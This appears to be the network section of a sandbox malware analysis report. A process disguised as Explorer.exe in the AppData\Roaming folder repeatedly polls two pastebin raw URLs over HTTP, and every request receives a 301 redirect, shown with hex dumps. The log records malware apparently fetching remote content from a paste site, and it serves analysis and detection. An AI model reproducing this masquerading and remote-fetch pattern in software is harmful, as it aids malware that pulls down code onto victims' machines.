                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.549790172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:12:50.240664959 CET74OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:12:51.354226112 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:12:51 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:12:51 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef53fc7c90843ed-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.549812172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:12:58.160624981 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:12:59.290079117 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:12:59 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:12:59 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef53ff97cc341d2-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.549815172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:12:59.410897970 CET74OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:00.523938894 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:00 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:00 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54001281572b1-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.549836172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:13:07.350838900 CET50OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:13:08.560107946 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:08 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:08 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540336aee41a9-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.549840172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:13:08.682054043 CET74OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:09.794367075 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:09 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:09 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5403b2b897d16-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.549861172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:13:16.595082998 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:17.705460072 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:17 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:17 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5406c9929422d-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.549866172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:13:17.835493088 CET74OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:18.956958055 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:18 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540744d9343f1-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.549885172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:13:25.751452923 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:26.862850904 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:26 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:26 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540a5dcbe4411-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.549890172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:13:27.066998959 CET74OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:28.121633053 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:27 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:27 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540ad89420f99-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            13192.168.2.549911172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:13:34.925534964 CET50OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:13:36.073672056 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:35 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:35 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540df1de042b8-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.549915172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:13:36.196400881 CET74OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:37.294008017 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:37 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:37 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef540e70c67c33b-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.549934172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:13:44.159759998 CET74OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:45.273494959 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:45 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:45 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54118ea4117b5-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.549938172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:13:45.395200014 CET74OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:46.809268951 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:46 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:46 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54120ba2e42f8-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                            Dec 9, 2024 14:13:46.921603918 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:46 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:46 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54120ba2e42f8-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.549959172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:13:53.789258957 CET50OUTGET /raw/hbwHfEg3 HTTP/1.1
                                                            Host: pastebin.com
                                                            Dec 9, 2024 14:13:54.860887051 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:54 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:54 GMT
                                                            Location: https://pastebin.com/raw/hbwHfEg3
                                                            Server: cloudflare
                                                            CF-RAY: 8ef54154de96efa7-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.549964172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 9, 2024 14:13:54.984843016 CET74OUTGET /raw/KKpnJShN HTTP/1.1
                                                            Host: pastebin.com
                                                            Connection: Keep-Alive
                                                            Dec 9, 2024 14:13:56.079979897 CET472INHTTP/1.1 301 Moved Permanently
                                                            Date: Mon, 09 Dec 2024 13:13:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 167
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=3600
                                                            Expires: Mon, 09 Dec 2024 14:13:55 GMT
                                                            Location: https://pastebin.com/raw/KKpnJShN
                                                            Server: cloudflare
                                                            CF-RAY: 8ef5415c7a574399-EWR
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.549985172.67.19.24807356C:\Users\user\AppData\Roaming\Explorer.exe
